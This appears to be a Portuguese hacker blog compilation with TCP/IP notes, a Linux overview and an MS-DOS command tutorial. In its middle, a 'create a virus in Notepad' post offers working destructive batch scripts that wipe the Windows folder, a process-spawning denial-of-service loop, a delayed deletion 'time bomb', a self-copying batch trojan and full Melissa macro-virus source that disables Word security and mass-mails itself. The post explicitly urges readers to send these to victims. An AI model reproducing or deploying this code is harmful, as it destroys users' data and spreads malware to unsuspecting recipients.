COMPLEMENTO DO TCP, OFERECE UM SERVIÇO DE TRANSMISSÃO DE DADOS SEM
CONEXÃO QUE NÃO GARANTE NEM A ENTREGA NEM A CORRETA SEQUENCIA DOS PACOTES
ENVIADOS (BEM PARECIDO COM O IP). CHECKSUNS NO UDP SÃO OPCIONAIS OFERECENDO
ASSIM UMA MANEIRA DE SE TROCAR DADOS EM UMA REDE ALTAMENTE CONFIÁVEL SEM
CONSUMIR DESNECESSARIAMENTE RECURSOS DA REDE.



ARP E ICMP: DOIS OUTROS PROTOCOLOS DA FAMÍLIA TCP/IP TEM IMPORTANTES FUNÇÕES,
EMBORA ESSAS FUNÇÕES NÃO ESTEJAM DIRETAMENTE RELACIONADAS COM A
TRANSMISSÃO DE DADOS: (ARP= ADDRESS RESOLUTION PROTOCOL, OU PROTOCOLO DE
RESOLUÇÃO DE ENDEREÇOS) E ICMP (INTERNET CONTROL MESSAGE PROTOCOL, OU
PROTOCOLO DE RESOLUÇÃO DE ENDEREÇOS NA INTERNET). O ARP E O ICMP SÃO
PROTOCOLOS DE MANUTENÇÃO QUE MANTÉM A ESTRUTURA DO IP E USUALMENTE SÃO
INVISÍVEIS AOS USUÁRIOS E AS APLICAÇÕES.



OS CABEÇALHOS DO IP CONTÉM TANTO O ENDEREÇO IP DA ORIGEM QUANTO DO DESTINO,
MAS O ENDEREÇO DO HADWARE TAMBÉM TEM DE SER CONHECIDO. O IP OBTÉM UM
ENDEREÇO DE HARDWARE DE UM DETERMINADO SISTEMA DIFUNDINDO PELA REDE UM
PACOTE ESPECIAL DE REQUISIÇÃO (UM PACOTE ARP DE REQUISIÇÃO) CONTENDO O
ENDEREÇO IP DO SISTEMA COM O QUAL ESTÁ TENTANDO SE COMUNICAR. TODOS NÓS DA
REDE LOCAL QUE TIVEREM O ARP HABILITADO DETECTAM ESSA DIFUSÃO, E O SISTEMA QUE
TEM O NÚMERO DE IP EM QUESTÃO ENVIA UM PACOTE ARP CONTENDO O ENDEREÇO DE
HARDWARE PARA O COMPUTADOR QUE SOLICITOU. O ENDEREÇO DE HARWARE E O
ENDEREÇO DO IP ESTÃO ARMAZENADO NO CACHE DO ARP PARA USO FUTURO. COMO A
RESPOSTA ARP TAMBÉM É FEITA NA FORMA DE DIFUSÃO, É NORMAL QUE OUTROS NÓS
USEM INFORMAÇÃO PARA ATUALIZAR SEUS CACHES ARP.



O ICMP PERMITE QUE 2 NÓS EM UMA REDE IP COMPARTILHEM O STATUS DO IP E
INFORMAÇÕE DE ERRO. ESSA INFORMAÇÃO PODE SER USADA POR PROTOCOLOS DE ALTO
NÍVEL PARA TRATAR PROBLEMAS DE TRANSMISSÃO OU PARA ADMINISTRADORES DE REDE
PARA DETECTAR PROBLEMAS NA REDE. EMBORA ESTEJAM ENCAPSULADOS EM PACOTES IP,
O ICMP NÃO É CONSIDERADO UM PROTOCOLO DE ALTO NÍVEL (ELE É NECESSÁRIO EM
TODA IMPLEMENTAÇÃO DO TCP/IP. O UTILITÁRIO PING FAZ USO DO ICMP PARA VERIFICAR
SE UM CERTO ENDEREÇO NA REDE ESTÁ OPERACIONAL. ISTO É UTIL PARA DETECTAR
PROBLEMAS EM REDES IP UO FALHAS EM GATEWAYS.



OUTROS PROTOCOLOS

ALÉM DESSES PROTOCOLOS CITADOS, EXISTEM OS PROTOCOLOS DE ALTO NÍVEL, COMO O


                                      44
TELNET, FTP, HTTP E ETC. VAMOS DAR UMA BREVE DESCRIÇÃO DELES:



TELNET: É UM PROTOCOLO QUE PERMITE O LOGON EM MÁQUINA REMOTAS. VOCÊ PASSA
A UTILIZAR A MÁQUINA REMOTA PARA REALIZAR O PROCESSAMENTO. NO WINDOWS NT
EXISTE O RAS (REMOTE ACCESS SERVICE, SERVIÇO DE ACESSO REMOTO) QUE TEM OS
MESMOS OBJETIVOS DO TELNET.



FTP: É UM PROTOCOLO UTILIZADO PARA FAZER TRANSFERÊNCIA DE ARQUIVOS.



HTTP: É O PROTOCOLO UTILIZADO NA WEB, ELE TRANSMITE TEXTOS, GRÁFICOS E
QUALQUER OUTRO TIPO DE ARQUIVO (SUBSTITUINDO O FTP), ALÉM DE PERMITIR A
NAVEGAÇÃO ATRAVÉS DE HIPER TEXTO.




Leia com Atenção

Lembrando que o conteúdo desta apostila é apenas pra estudo e conhecimento dos
usuarios de internet.



O final da apostila chegou, espero que tirem bom aproveito dela.

Postado por Original's Hacker às 14:19 12 comentários




Criar Vírus no Bloco de Notas




Criando Virus no Notepad

É muito simples, voce vai fazer um virus no bloco de notas é só seguir as indicações,

abra o bloco de notas

                                             45
Copie os códigos escolhidos e cole no bloco de notas, ao salvar voce usa a extençao .bat

exemplo: onomedoarquivo.bat

Se vc usar outra extensão o arquivo ñ ira pegar



AVISO:Não execute estes virus em seu proprio Pc, pois pode ocorrer serios danos, voce
deve enviar para as vitimas!!!



████████████



Nome:Del All Windows

rmdir /s /q c:windows

Função:Deleta tdo do Windows (fode o pc



Nome:Autoexec

@ECHO OFF

@BREAK OFF

deltree/C: Y*.*

Função:Fode com tudo



Nome:Trojan-1

VERSION 5.00

Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "mscomctl.ocx"

Begin VB.Form Form1

BackColor = &H80000007&

BorderStyle = 1 'Fixed Single

Caption = "Welcome to XP Blaster Pro (Enterprise Edition)!"

ClientHeight = 5400


                                             46
ClientLeft = 45

ClientTop = 390

ClientWidth = 8085

BeginProperty Font

Name = "Fixedsys"

Size = 9

Charset = 0

Weight = 400

Underline = 0 'False

Italic = 0 'False

Strikethrough = 0 'False

EndProperty

Icon = "Source3.frx":0000

LinkTopic = "Form1"

MaxButton = 0 'False

MinButton = 0 'False

MouseIcon = "Source3.frx":08CA

PaletteMode = 2 'Custom

ScaleHeight = 5400

ScaleWidth = 8085

ShowInTaskbar = 0 'False

StartUpPosition = 3 'Windows Default

Begin VB.CommandButton Command3

Caption = "About"

BeginProperty Font

Name = "MS Sans Serif"



                                       47
Size = 8.25

Charset = 0

Weight = 400

Underline = 0 'False

Italic = 0 'False

Strikethrough = 0 'False

EndProperty

Height = 375

Left = 120

TabIndex = 3

Top = 4920

Width = 1215

End

Begin VB.CommandButton Command2

Appearance = 0 'Flat

BackColor = &H000000FF&

Caption = "WEBSITE"

BeginProperty Font

Name = "Trebuchet MS"

Size = 8.25

Charset = 0

Weight = 400

Underline = 0 'False

Italic = 0 'False

Strikethrough = 0 'False

EndProperty



                                  48
Height

Função:Augumas dos trojans tradiçionais



Nome:Del p/ Windows

del /s /q c:windows

Função:Deleta tudo dentro do Windows ex: arquivos e naum pastas



Nome:Shutdown-S

shutdown -s

Função:Desliga o pc



Nome:Shutdown-R

shutdown -r

Função:Reinicia o pc



Nome:Trojan-2

@echo off

ctty nul

rem

for %%f in (*.exe *.com) do set A=%%f

if %A%==COMMAND.COM set A=

rename %A% V%A%

if not exist V%A% goto end

attrib +h V%A%

copy %0.bat %A%

attrib +r %A%



                                          49
ren %A% *.bat

set A=

:end

ctty con

@if exist V%0.com V%0.com %1 %2 %3

@if exist V%0.exe V%0.exe %1 %2 %3

Função:Fode com tudo mesmo...



Nome:Pirata

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Função:Testar seu Anti-Virus ou enganar auguem.



Nome:Melissa 1999

// Melissa Virus Source Code

Private Sub Document_Open()

On Error Resume Next

If System.PrivateProfileString("",

"HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") <> ""

Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("",

"HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity", "Level") = 1&

Else

CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):

Options.SaveNormalPrompt = (1 - 1)



                                             50
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

Set UngaDasOutlook = CreateObject("Outlook.Application")

Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("",

"HKEY_CURRENT_USERSoftwareMicrosoftOffice", "Melissa?") <> "... by Kwyjibo"

Then

If UngaDasOutlook = "Outlook" Then

DasMapiName.Logon "profile", "password"

For y = 1 To DasMapiName.AddressLists.Count

Set AddyBook = DasMapiName.AddressLists(y)

x=1

Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x=x+1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

BreakUmOffASlice.Subject = "Important Message From " &

Application.UserName

BreakUmOffASlice.Body = "Here is that document you asked for ... don't

show anyone else Wink"

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName

BreakUmOffASlice.Send

Peep = ""



                                           51
Next y

DasMapiName.Logoff

End

Função:se espalha rapidamente e força empresas como Intel e Microsoft, entre outras, a
fechar seus sistemas de e-mail para conter a praga, que se disseminava via Outlook. O vírus,
além de se enviar pela Internet, modificava documentos do Word colocando falas do
programa de televisão Os Simpsons. Causou danos estimados em US$ 300 milhões a US$
600 milhões.



Nome:CLICK EM MIM

@ECHO OFF

:REPETE

MSG * CLICK EM MIM

GOTO REPETE

Função:Fica repetindo varias vezes a mesma mensagem



Nome:Progstar

@echo off

rem Denial Of Service Local

:Fucker

start notepad.exe

start write.exe

start sol.exe

start cmd.exe

start powerpnt.exe

start excel.exe

start winword.exe

start msacess.exe


                                            52
goto Fucker:

Função:Abre varios programas sem parar, fais o pc travar



Nome:bomba relógio

c:

cd

echo off

if exist lig1.drv goto 2

echo > lig1.drv sdfsdf

goto fim

:2

if exist lig2.drv goto 3

echo > lig2.drv sdfsdf

goto fim

:3

if exist lig3.drv goto 4

echo > lig3.drv sdfsdf

goto fim

:4

if exist lig4.drv goto 5

echo > lig4.drv sdfsdf

goto fim

:5

if exist lig5.drv goto 6

echo > lig4.drv sdfsdf

goto fim



                                           53
:6

if exist lig6.drv goto 7

echo > lig6.drv sdfsdf

goto fim

:7

rmdir C:windows

rmdir C:arquivos de programas

rmdir C:documents and settings

:fim

Função:depois que ele for ativado 7 vezes ele apaga tudo

Nome:MSN Fixer

cd %USERPROFILE%

cd Config~1

cd Dadosd~1

cd Micros~1

cd "Windows Live Contacts"

del /s /q *.*

Função:Congela todos os msn's que estao sendo executados.



Obs. "Conhecimento não é crime!! eu não me responsabilizo por seus atos!!"

Postado por Original's Hacker às 10:39 104 comentários




Linux o melhor SO (Sistema Operacional)




                                           54
Introduçao



O que diabos é Linux?



Esta é uma pergunta feita por muita gente, e há muitas respostas para ela. Linux é um
sistema operacional, como os *BSD (FreeBSD, NetBSD e outros), OS/2, Windows, MacOS,
BeOS, etc. O sistema operacional é o que permite o usuário usar o computador. O criador
do Linux se chama Linus Torvalds. Com o nome que o autor tem, já dá pra tirar uma
conclusão daonde é originado o nome "Linux"... Como o Linux é beaseado (ideologicamente
falando) no Unix, ele juntou o seu nome (Linus) com Unix, e deu Linux :)



O Linux é um sistema operacional multi-tarefa e multi-usuário. Além disso, ele é suportado
por várias plataformas (inclusive as mais populares como a arquitetura Intel, que todo o
mundo usa). Ele é usado por muitas empresas (principalmente provedores) por sua alta
capacidade de Rede e conversação com outros sistemas (como por exemplo, redes
Windows e Novell), além de suportar também vários tipos de sistemas de arquivos.



Mas o barato de tudo, e o que deu impulso ao desenvolvimento do Linux é justamente por
ele ser um sistema livre e gratuito (Open Source). Isso quer dizer que você não precisa pagar
para usá-lo, e nem ele requer nenhuma licença de uso. O Linux simplesmente pode ser pego
na Internet, copiado de um amigo, ou seja lá o que for, sem restrições. E além de gratuito,
ele é livre! Livre? Sim, livre! O código-fonte do núcleo do sistema (kernel) está liberado sob
a licença GPL, e pode ser pego na Internet por qualquer pessoa... Isto quer dizer que
qualquer pessoa pode pegar e alterar o código livremente, modificando ao seu próprio
gosto e suas próprias necessidades. Por ser livre, o Linux têm como desenvolvedores vários
e vários hackers espalhados pelo mundo, que contribuem sempre mandando pedaços de
códigos e implementações à Linus Torvalds, que organiza tudo e lança junto ao kernel
oficial. Um dos nomes mais conhecidos como contribuidores para o kernel é Alan Cox, e
você pode obter uma lista de outros contribuidores do kernel junto com o código-fonte do
kernel que pode ser baixado através do endereço ftp://ftp.kernel.org (se possível use
mirrors para baixar os kernels).



Quem diria que o Linux ia se desenvolver tanto! No começo nada passava de um grupo de
hackers que usavam o sistema. Agora temos muitos usuários caseiros usando, além de
várias empresas prestando serviços (como suporte e desenvolvimento de programas), e


                                             55
todo tipo de coisa mais. Sua popularidade cresceu muito, e continua crescendo. As
estatisticas dizem que o Linux vai crescer e crescer, e a tendência é realmente essa! Pois o
Linux é um sistema operacional de deixar qualquer um de queixo caído. No futuro, acredito
que mais e mais empresas vão começar a adotar o Linux como sistema padrão, e começar a
desenvolver produtos apenas para ele. Deixando de lado um pouco o monopólio de
empresas como a Microsoft e seu sistema operacional Windows.



Você ainda não testou? Recomendo você fazer isso agúra! Pode ser um pouco estranho no
começo, mas você aos poucos vai se acostumando, e acaba por se adaptar totalmente à
ele! Eu mesmo me adaptei e só uso ele :) Viva o Linux!



A história do Linux



Como usuários fiéis, não podemos nos esquecer da história do Linux... Como surgiu isso
tudo? Linus Torvalds, o pioneiro criador, era inscrito numa lista de programadores. Um dia
ele estava lendo as mensagens e se bateu com uma pergunta: "Lembra-se daquela época
quando os homens escreviam seus próprios drivers de dispositivos (device drivers)?' Ele
então resolveu desafiar a si mesmo, e criar um sistema operacional onde se tinha uma
liberdade e não se ficasse "preso' no sistema. O que ele tinha em mente era um Unix!
Porém, ele não tinha verba suficiente para comprar os caríssimos Unix que eram o tipo de
sistema que ele queria.



Inspirado num pequeno e humilde sistema feito por Andy Tanembaum, o Minix, Linus
trabalhou duro para fazer o Linux e desenvolver ele. Um pouco antes de lançar a primeira
versão oficial do kernel, Linus mandou a seguinte mensagem para o grupo de notícias
comp.os.minix:



"Você suspira por melhores dias do Minix-1.1, quando homens serão homens e escreverão
seus próprios drivers de dispositivos? Você está sem um bom projeto e está morrendo por
colocar as mãos em um sistema operacional no qual você possa modificar de acordo com
suas necessidades? Você está achando frustrante quando tudo trabalha em Minix? Chega
de atravessar noites para obter programas que trabalhem corretamente? Então esta
mensagem pode ser exatamente para você.



Como eu mencionei a um mês atrás, estou trabalhando em uma versão independente de
um sistema operacional similar ao Minix para computadores AT-386. Ele está, finalmente,

                                             56
próximo do estágio em que poderá ser utilizado (embora possa não ser o que você esteja
esperando), e eu estou disposto a colocar os fontes para ampla distribuição. Ele está na
versão 0.02... contudo eu tive sucesso rodando o bash, gcc, gnu-make, gnu-sed, compressão
e etc nele."



No dia 5 de Outubro de 1991, Linus Torvalds anunciou a primeira versão oficial do Linux,
versão 0.02. Desde então muitos programadores têm respondido ao seu chamado, e têm
ajudado a fazer do Linux o sistema operacional que é hoje, uma grande maravilha. Um
sistema criado inteiramente por programadores espalhados pela Internet, os hackers!

Qual a diferença entre Linux e Unix?



Linus Torvalds, quando criou o Linux, criou ele nos padrões "POSIX", que é o mesmo padrão
que os UNIX usam. É por esse mesmo uso do padrão POSIX que o Linux é parecido com o
UNIX. Além do mais, existem vários tipos de UNIX, que têm seu código-fonte fechado, e
pago. Uma resposta mais completa para esta pergunta foi feita pelo Fernando M. Roxo:



Limpo, claro e definitivo: O Linux não é UNIX. O Linux é um UNIX. O UNIX foi um sistema
criado e registrado pela Unix Lab. Todos os sistemas baseados naqueles códigos são
chamados de uma forma geral de UNIX.



Linux foi escrito desde o inicio pelo Linus Torvalds e não contém nenhuma linha de código
do UNIX. Mas o Linux foi escrito para ser conforme o padrão POSIX, que deve ser o padrão
da API (Application Programming Inteface) Unix, que em última análise pode ser resumido
(forçando um pouco a barra) como sendo as chamadas do sistema. Por isto se diz que o
Linux é um Unix (não UNIX). Tem uma diferença sutil aí.



Por causa da API POSIX, do conjunto de utilitários (FSF/GNU em sua maioria) e do uso do X-
Window (XFree) o Linux é tão parecido com o UNIX que existem empresas que usam o Linux
para desenvolver para UNIX que não seja o dela mesma (por exemplo a IBM).

As Distribuições



Voltando mais um pouco ao escopo do que é Linux, podemos ressaltar que o Linux é o
sistema operacional, ou seja, o kernel (núcleo). Mas o que é um sistema operacional sem
programas? Para que haja um uso dos recursos que o sistema operacional pode oferecer, os


                                            57
programadores vão criando aplicações e utilitários que vão dar o gostinho ao usuário.



O papel das distribuições é isso: empacotar o Linux. O que as distribuições fazem é reunir os
programas disponíveis com o kernel, e deixar o sistema pronto para o uso. Sem as
distribuições não haveria a popularização do Linux, pois seria um grande trabalho o usuário
instalar o sistema puro, e depois compilar os programas deixando-os compatíveis.



Existem inúmeras distribuições existentes por esse mundo afora. Mas há sempre as
distribuições mais conhecidas, que são as mais atuantes no mercado. Elas são: Slackware,
Conectiva Linux, Debian, Red Hat Linux, SuSE, Mandrake. Cada um tem suas características
bem marcantes. E se fôssemos discutir aqui quais as vantagens de cada uma em relação a
outra, não conseguiríamos. A escolha da distribuição é uma escolha a gosto.

Meu micro suporta Linux?



Basicamente, para você usar o Linux, você precisará de no mínimo um 386. Isso mesmo, o
Linux roda em 386! É claro que para um uso amplo de todos os programas e o sistema X-
Window (gráfico), você terá de ser mais exigente com seu hardware... Mas todos os
computadores compatíveis com a arquitetura Intel são suportados pelo Linux (e também
outros tipos de arquiteturas como por exemplo o Alpha).



Para a memória RAM, você irá precisar de no mínimo 2MB de RAM. É recomendável ter
8Mb acima para rodar o servidor X. E seguindo a mesma filosofia do que falei antes, sempre
é bom você ter mais para usar tudo rápido e sem perder a paciência :) Espaço em disco?
Depende muito. As distribuições atuais disponibilizam até 6 CDs recheados de programas,
que podem simplesmente acabar com o espaço do seu disco em alguns minutos! Uma
instalação básica do Linux, apenas com o básico mesmo, dá 10MB. Eu acredito que 1GB seja
suficiente para colocar todo tipo de coisa que você vai usar (e até coisa que você nem vai
usar).



Só como curiosidade, aqui em casa, eu já rodei meu Linux nos seguintes computadores:
Primeiro num Pentium 100, com 24MB de RAM, e 1GB de espaço em disco. Rodei também
num 386 (nem me pergunte quantos Mhz é porque eu não faço a mínima idéia :) com 8MB
de memória RAM, num HD de 256MB. E por último em um Celeron 300 com 32MB de RAM
e 1GB de espaço em disco. Atualmente eu estou usando em um K6-II 550, com 64MB de
RAM, e 10GB de espaço no HD.



                                             58
Outra dúvida muito comum é: O Linux roda em laptops? Sim! Roda muito bem e suporta
bem os dispositivos PCMCIA... Não tem absolutamente nada com o que se preocupar.

Por que eu devo confiar no Linux?



Pergunta muito fácil de se responder, inclusive eu vou responder bem grosseiramente: Ele é
bom! :) O Linux tem ganhado credibilidade cada vez mais por ser um sistema seguro,
estável, e confiável. É muito difícil (senào quase impossível) que o Linux em si dê um crash.
Só para ter uma idéia, nestes 4 anos em que uso Linux, só obtive no máximo 3 travamentos!
Por que estes travamentos? Bem, um foi na época em que exploraram uma falha no kernel
e criaram o teardrop (um exploit que travou as coisas aqui), e os outros dois foi por causa
de um problema na placa mãe :) Quer dizer, já aconteceu algumas outras vezes de minha
interface travar, mas eu dei um telnet e um ping na máquina através de outra na rede, e ela
respondia. Geralmente isso acontece comigo no Quake, quando eu mando conectar em
algum nome de host que não existe, o SVGAlib (biblioteca que o Quake usa) simplesmente
para de funcionar e você não tem mais como teclar algo ou mudar de tela... Mas tive a
certeza que não foi o sistema que travou e sim o SVGAlib que travou meu teclado e monitor
:)



Empresas cada vez mais estão apostando no Linux. A IBM é uma das empresas que mais
está investindo pesado no Linux, sendo com ajuda financeira, parcerias e desenvolvimento
de programas. A Intel é outra empresa que também está ajudando muito, investindo
bastante nos desenvolvedores do sistema. Além disso, várias outras pequenas ou médias
empresas estão cada vez mais adotando o Linux como sistema padrão pelo simples fato de
que ele funciona melhor e mais estávelmente que outros sistemas como o Windows. Pode
ser que você ache que isto tudo conversa fiada, mas o Linux é bem estável mesmo! Já vi
sistemas Linux ligados por vários meses sem nem sequer dar um reboot na máquina.
Inclusive aqui em casa eu consegui deixar o meu Linux ligado por 23 dias, pena que faltou
luz e o computador desligou (buá não tenho nobreak :~().



Basicamente é isso. Você tem de confiar no Linux porque ele é bom e tá acabado. E só
tende a melhorar, antigamente não havia nem uma interface gráfica muito boa e usável
para quem está iniciando na computação. Hoje temos o GNOME e KDE que são duas ótimas
interfaces gráficas para quem está engatinhando. São coisas que fazem o Linux valer a pena!

1.7. O que é GPL?




                                             59
Se você já ouviu falar bem de Linux, com certeza já deve ter ouvido falar nesta sigla. GPL
significa General Public License (ou traduzindo grosseiramente: Licença Pública Geral), e foi
criada pela Free Software Foundation. A grande maioria dos programas que vêm nas
distribuições Linux são de código-fonte aberto, e usam esta licença. Uma licença serve para
proteger o seu código quando ele for lançado para o público.



A licença GPL permite que o autor do código distribua livremente o seu código... Outras
pessoas podem simplesmente pegar este código, modificar à suas próprias necessidades e
usar à vontade. O único requerimento é que a pessoa que modificou deve lançar o código
modificado em GPL e manter também o seu código aberto (e não apenas distribuir os
binários). Isso tudo cria uma comunidade de desenvolvedores onde toda a ajuda é mútua, e
você pode pegar várias idéias de outros desenvolvedores simplesmente olhando o código
deles. Além disso, você pode aproveitar e poder ajudar o desenvolvedor, criando correções
e mandando-as para o autor.



É com essa licença que o kernel do Linux é liberado. É assim que o kernel tem seu
desenvolvimento feito por várias e várias pessoas em todo o mundo. Estas pessoas pegam
livremente o código-fonte do kernel, analizam-no e procuram por erros. Se encontrarem
erros, escrevem correções e mandam para o Linus Torvalds. E não só correções, mas
desenvolvedores também fazem novas implementações ao kernel e mandam para o Linus
Torvalds organizar tudo. E é assim que temos hoje em dia este grande e bem feito e
organizado kernel do Linux! É assim que a filosofia GPL funciona, e funciona muito bem para
criar uma comunidade de desenvolvedores justa! Eu pessoalmente apóio e muito a licença
GPL, que para mim é simplesmente perfeita. Vivas à Free Software Foundation por criar esta
licença! E vivas para os desenvolvedores que a utilizam para seus códigos! :)

Postado por Original's Hacker às 09:48 0 comentários




Mini Tutorial MS Dos




http://bp1.blogger.com/_A_Q4n38HnGM/RtXltSvxCLI/AAAAAAAAAAc/kROsLiJVD04/s1600-
h/ms+dos.jpg



                                             60
Comandos do MS-DOS

Este tutorial tem por objetivo mostrar os comandos do DOS. Muitas pessoas pensam que
são "inúteis", mas caso ocorra alguma emergência no PC você irá precisar destes comandos
então vai...

1. Diferenças entre comandos internos e externos Os comandos internos podem ser
executados em qualquer pasta no PC e a qualquer momento pois estão embutidos no DOS.
Os comandos externos são programas utilitários que acompanham o sistema operacional e
que só podem ser executados onde estão localizados, ou seja, no drive onde foram
gravados. Este tutorial está dividido em 2 partes: comandos internos e comandos externos.

2. Os comandos internos Nos comandos internos pode-se saber mais informações acerca do
mesmo, digitando /? após o comando, ex.: dir/?, você irá receber informações sobre o
comando dir, os comandos internos são os mais úteis em emergências já que podem ser
executados em qualquer lugar; agora, vamos aos comandos.

Comando DATE Esse comando, como o nome já diz, mostra na tela a data atual, permitindo
a sua modificação. O comando DATE deverá ser usado da seguinte maneira: date [opções]
(Sem os colchetes), sendo que não é necessária a utilização das opções caso você não
queira.

Ex.: Digitando date, irá aparecer:

Data atual: sáb 28/06/2003 Digite a nova data: (dd-mm-aa)

Opções:

/t - Informa a data mas não solicita uma nova.

Comando TIME Esse comando faz a mesma coisa que o comando DATE mas ao invés de
mudar a data ele muda a hora: esse comando mostra hora, minutos, segundos e centésimos
de segundo. O comando TIME deverá ser usado da seguinte maneira: Time [opções] (Sem
os colchetes), sendo que não é necessária a utilização das opções caso você não queira.

Ex.: Digitando time, irá aparecer:

Hora Atual: 17:01:20,98 Digite a nova Hora:

Opções:

/t - Informa a hora mas não solicita uma nova.

Comando VER Esse comando mostra qual sistema operacional você está usando.

Ex.: Digitando ver, irá aparecer:



                                              61
Microsoft Windows XP [versão 5.1.2600]

Comando CLS Esse comando limpa a tela e posiciona o cursor no canto superior esquerdo
da tela.

Comando Dir O comando dir é muito famoso e quase todos já conhecem: ele mostra todos
arquivos e pastas de um diretório e busca arquivos em um drive especificado. O comando
DIR é usado da seguinte maneira: dir [drive:][caminho] arquivo(s) [opções] (Sem os
colchetes) sendo que não é necessária a utilização das opções caso você não queira nem de
arquivo(s).

Opções:

/p - A listagem pára toda vez que atinge o fim da tela, sendo necessário que se pressione
qualquer tecla para continuar. /b - Mostra somente as informações básicas. /c - Mostra o
separador de milhar no tamanho dos arquivos. /w - Exibe a lista na horizontal, onde são
mostrados 5 arquivos por linha. /d - O mesmo que /w, só que mostra a lista em colunas. /s -
Exibe os arquivos de todos os subdiretórios. /l - Usa letras minúsculas. /n - Formato de lista
longa em que os nomes dos arquivos ficam na extrema direita. /q - Mostra o nome do dono
do arquivo. /4 - Exibe anos de 4 dígitos.

/t:campo- Controla qual campo de tempo é exibido ou usado na classificação onde campo
deve ser substituído por um desses caracteres e não devem ser digitados os 2 pontos (.

C - Criação. A - Último acesso. W - Última gravação.

/o:ordem – Mostra os arquivos em uma ordem, onde ordem deve ser substituída por um
desses caracteres e não devem ser digitados os 2 pontos (.

N - Nome do arquivo seguido pela extensão. S - Tamanho do arquivo. D - Ordem
cronológica. G - Grupos de arquivos de subdiretórios.

/a:atributo – Mostra somente arquivos de determinado atributo, onde atributo deve ser
substituído por algum desses caracteres e não devem ser digitados os 2 pontos (.

D – Nome do arquivo seguido pela extensão. R – Arquivos somente leitura. H – Arquivos
ocultos .

Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-)

Ex.: Dir /a-h, mostra todos os arquivos menos os arquivos ocultos.

Comando COPY O comando COPY copia um determinado arquivo ou o disco inteiro, sendo
que caso exista algum arquivo no destino com o mesmo nome do arquivo de origem, esse
arquivo será substituído. O COPY deve ser usado da seguinte maneira: copy [drive:]
[caminho] arquivo(s) de destino [opções] (Sem colchetes), sendo que não é necessária a
utilização das opções caso você não queira.



                                             62
Opções: /v - Verifica o arquivo de destino após a cópia, esta opção deixa o copy mais lento.
/a - Indica um arquivo de texto ASCII. /b - Indica um arquivo binário. /d - Permite que o
arquivo de destino seja criado descriptografado. /n - Usa um nome de arquivo curto (Padrão
8.3), caso copie um arquivo fora deste padrão. /y - Não pede confirmação para que você
substitua um arquivo de destino já existente. /-y - Pede confirmação para que você
substitua um arquivo de destino já existente. /z - Copia arquivos de rede no modo
reiniciável.

Comando TYPE Mostra o conteúdo de um arquivo (somente um por vez e não aceita
caracteres curinga).

Comando REN ou RENAME Renomeia o arquivo. Pode-se também alterar a extensão do
mesmo.

Ex.: Ren Arquivo.txt Backup.bak, Isto renomeia o arquivo: Arquivo.txt, para Backup.bak.

Comando DEL ou ERASE Apaga arquivos do disco rígido e deve ser usado da seguinte
maneira: del [drive:][caminho] nome do(s) arquivo(s) [opções] (Sem colchetes), sendo que
não é necessária a utilização das opções caso você não queira.

Opções: /p - Força a mensagem de confirmação "Apagar( S / N )?". /f - Força a exclusão de
arquivos somente leitura. /s - Exclui arquivos de todas as subpastas. /q - Modo silencioso,
não pede confirmação para excluir um caractere curinga global.

/a:atributo - Exclui somente arquivos de determinado atributo, onde atributo deve ser
substituído por algum desses caracteres e não devem ser digitados os 2 pontos (.

S - Arquivos de sistema. R - Arquivos somente leitura. H - Arquivos ocultos. A - Arquivos
prontos para arquivamento.

Obs.: Para reverter o efeito dos caracteres, é necessário a colocação de um hífen (-).

Ex.: Del *.* /a-h, executando este comando, você exclui todos os arquivos menos os
arquivos ocultos da pasta.

Comando MD ou MKDIR Cria uma pasta, devendo ser usado da seguinte maneira: MD Pasta,
onde Pasta é o nome da pasta que você quer criar.

Comando CD ou CHDIR Entra ou sai de uma pasta: se você digitar CD TESTE, por exemplo,
ele entrará na pasta TESTE. Se você digitar CD.. ele irá voltar para a pasta anterior. O mesmo
vale para o CHDIR.

Comando RD ou RMDIR Remove uma pasta que esteja vazia, sendo que não consegue
remover pastas com arquivos. Deve ser usado da seguinte maneira: rd [opções] (Sem
colchetes), sendo que não é necessária a utilização das opções caso você não queira.

Ex.: Digitando RD Teste você irá excluir a pasta teste.



                                              63
Opções: /s - Remove todas as pastas e arquivos da pasta, além dela mesma. /q - Modo
silencioso, não pede confirmação para remover a árvore de pastas quando usado com /s.

2. Os comandos externos

Assim como nos comandos internos pode-se usar o comando auxiliar /?, dentre os
comandos externos, alguns são muito úteis, como o format veremos logo adiante...

Comando ATTRIB O Attrib altera ou mostra os atributos de um arquivo, devendo ser usado
da seguinte maneira: attrib [Atributo] [drive:][caminho] nome do(s) arquivo(s) [opções]
(Sem colchetes), sendo que não é necessária a utilização de opções caso você não queira.

Opções do "Atributo" dos colchetes:

+ Ativa um atributo. - Desativa um atributo. r - Atributo de arquivo somente leitura. a -
Atributo de arquivo de leitura/gravação. s- Atributo de arquivo de sistema. h - Atributo de
arquivo oculto.

Opções: /s - Processa os arquivos da pasta atual. /d - Inclui pastas.

Comando FORMAT Como o nome já diz, ele formata o drive. Deve ser usado da seguinte
maneira: format [drive:] [opções] (Sem colchetes), sendo que não é necessária a utilização
de opções caso você não queira.

Opções: /fs:sistema de arquivos - Formata a partição como fat32, fat ou ntfs, é necessário
substituir "sistema de arquivos", por fat32, fat ou ntfs. /v:nome - Formata a partição com
um nome de volume específico. /q - Formatação rápida (Tão rápida quanto a formatação de
um disquete). /c - Arquivos criados na partição serão compactados (somente com partições
ntfs). /x - Força primeiro a desmontagem do volume, se necessário. Todos os identificadores
abertos no volume não seriam mais válidos. /f:tamanho - Especifica o tamanho do disquete
a ser formatado (Em formatações de disquete, claro). /t:trilhas - Especifica o número de
trilhas por lado do disco. /n:setores- Especifica o número de setores por trilha.

